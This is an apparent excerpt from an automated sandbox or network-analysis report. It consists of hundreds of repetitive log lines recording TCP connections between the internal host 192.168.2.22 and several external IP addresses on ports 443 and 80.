                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global trafficTCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 185.199.109.133:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49163
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49164
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49166
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
                  Source: global traffic TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 172.67.216.244:443
                  Source: global traffic TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49168
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 91.134.96.177:80
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
                  Source: global traffic TCP traffic: 91.134.96.177:80 -> 192.168.2.22:49169
